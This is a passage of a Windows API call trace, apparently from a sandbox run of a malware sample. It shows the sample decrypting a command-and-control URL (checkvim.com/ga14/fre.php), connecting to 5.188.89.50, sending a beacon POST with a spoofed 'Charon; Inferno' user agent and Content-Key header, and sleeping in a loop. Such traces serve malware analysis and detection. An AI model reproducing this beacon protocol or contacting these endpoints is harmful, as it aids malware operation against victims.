(lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.175] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0248.176] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.176] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.183] GetProcessHeap () returned 0x840000 [0248.183] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0248.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.184] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0248.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.186] CryptDestroyKey (hKey=0x87e470) returned 1 [0248.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.188] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0248.188] GetProcessHeap () returned 0x840000 [0248.188] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0248.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.189] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.190] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.191] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.193] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.193] GetProcessHeap () returned 0x840000 [0248.193] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871268 [0248.193] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0248.194] GetProcessHeap () returned 0x840000 [0248.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871268 | out: hHeap=0x840000) returned 1 [0248.194] GetProcessHeap () returned 0x840000 [0248.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0248.194] GetProcessHeap () returned 0x840000 [0248.194] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0248.194] GetProcessHeap () returned 0x840000 [0248.194] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7a0 [0248.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.195] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0248.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.205] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0248.214] GetProcessHeap () returned 0x840000 [0248.214] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0248.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.216] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0248.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.217] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0248.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.219] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.219] GetProcessHeap () returned 0x840000 [0248.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0248.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.220] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0248.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.221] CryptDestroyKey (hKey=0x87e970) returned 1 [0248.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.307] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0248.307] GetProcessHeap () returned 0x840000 [0248.307] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0248.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.309] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0248.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.310] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0248.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.312] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0248.312] GetProcessHeap () returned 0x840000 [0248.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0248.312] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0248.314] GetProcessHeap () returned 0x840000 [0248.314] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0248.314] socket (af=2, type=1, protocol=6) returned 0x36c [0248.314] connect (s=0x36c, name=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0248.384] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ad0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0248.384] GetProcessHeap () returned 0x840000 [0248.384] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f798 [0248.384] GetProcessHeap () returned 0x840000 [0248.384] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0248.385] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0248.386] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0248.386] GetProcessHeap () returned 0x840000 [0248.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0248.386] GetProcessHeap () returned 0x840000 [0248.386] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0248.386] GetProcessHeap () returned 0x840000 [0248.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa28 [0248.386] GetProcessHeap () returned 0x840000 [0248.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0248.387] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0248.388] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0248.388] GetProcessHeap () returned 0x840000 [0248.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0248.388] GetProcessHeap () returned 0x840000 [0248.388] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0248.388] send (s=0x36c, buf=0x873a58*, len=237, flags=0) returned 237 [0248.389] send (s=0x36c, buf=0x87eb58*, len=159, flags=0) returned 159 [0248.389] GetProcessHeap () returned 0x840000 [0248.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0248.389] recv (in: s=0x36c, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 237 [0248.746] GetProcessHeap () returned 0x840000 [0248.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0248.747] GetProcessHeap () returned 0x840000 [0248.747] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0248.747] GetProcessHeap () returned 0x840000 [0248.747] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0248.747] GetProcessHeap () returned 0x840000 [0248.747] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f798 | out: hHeap=0x840000) returned 1 [0248.747] closesocket (s=0x36c) returned 0 [0248.747] GetProcessHeap () returned 0x840000 [0248.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0248.748] GetProcessHeap () returned 0x840000 [0248.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0248.748] GetProcessHeap () returned 0x840000 [0248.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0248.748] GetProcessHeap () returned 0x840000 [0248.748] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0248.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8805c8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x604) returned 0x36c [0248.750] Sleep (dwMilliseconds=0xea60) [0248.751] GetProcessHeap () returned 0x840000 [0248.751] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0248.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.753] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0248.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.761] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0248.768] GetProcessHeap () returned 0x840000 [0248.768] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0248.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.769] CryptImportKey (in: hProv=0x86f248, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0248.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.770] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0248.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.771] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.771] GetProcessHeap () returned 0x840000 [0248.771] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0248.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.772] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0248.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.773] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0248.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.774] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0248.774] GetProcessHeap () returned 0x840000 [0248.774] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0248.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.775] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0248.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.777] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0248.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.779] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0248.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.780] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0248.780] GetProcessHeap () returned 0x840000 [0248.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0248.780] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0248.780] GetProcessHeap () returned 0x840000 [0248.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0248.780] GetProcessHeap () returned 0x840000 [0248.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0248.780] GetProcessHeap () returned 0x840000 [0248.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0248.780] GetProcessHeap () returned 0x840000 [0248.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0248.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.799] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0248.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.805] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0248.812] GetProcessHeap () returned 0x840000 [0248.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0248.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.814] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0248.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.815] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0248.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.816] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0248.817] GetProcessHeap () returned 0x840000 [0248.817] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0248.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.817] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0248.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.819] CryptDestroyKey (hKey=0x87e830) returned 1 [0248.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0248.820] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0248.820] GetProcessHeap () returned 0x840000 [0248.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0248.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.821] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0248.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.822] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0248.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0248.823] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0248.823] GetProcessHeap () returned 0x840000 [0248.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0248.823] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0248.825] GetProcessHeap () returned 0x840000 [0248.825] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b98 [0248.825] socket (af=2, type=1, protocol=6) returned 0x370 [0248.825] connect (s=0x370, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0248.894] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0248.894] GetProcessHeap () returned 0x840000 [0248.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0248.894] GetProcessHeap () returned 0x840000 [0248.894] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0248.895] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0248.896] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0248.896] GetProcessHeap () returned 0x840000 [0248.896] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0248.896] GetProcessHeap () returned 0x840000 [0248.896] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0248.896] GetProcessHeap () returned 0x840000 [0248.896] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0248.896] GetProcessHeap () returned 0x840000 [0248.896] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0248.896] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0248.897] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0248.897] GetProcessHeap () returned 0x840000 [0248.897] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0248.897] GetProcessHeap () returned 0x840000 [0248.897] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0248.897] send (s=0x370, buf=0x873a58*, len=237, flags=0) returned 237 [0248.898] send (s=0x370, buf=0x87eb58*, len=159, flags=0) returned 159 [0248.900] GetProcessHeap () returned 0x840000 [0248.900] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0248.900] recv (in: s=0x370, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 237 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0249.266] closesocket (s=0x370) returned 0 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b98 | out: hHeap=0x840000) returned 1 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0249.266] GetProcessHeap () returned 0x840000 [0249.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0249.266] GetProcessHeap () returned 0x840000 [0249.267] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0249.267] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8805c8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa28) returned 0x370 [0249.268] Sleep (dwMilliseconds=0xea60) [0249.270] GetProcessHeap () returned 0x840000 [0249.270] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0249.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.271] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0249.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.277] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0249.303] GetProcessHeap () returned 0x840000 [0249.304] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0249.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.305] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0249.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.306] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0249.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.308] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.308] GetProcessHeap () returned 0x840000 [0249.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0249.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.309] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0249.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.311] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0249.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.312] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0249.312] GetProcessHeap () returned 0x840000 [0249.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0249.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.313] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.315] StrStrA 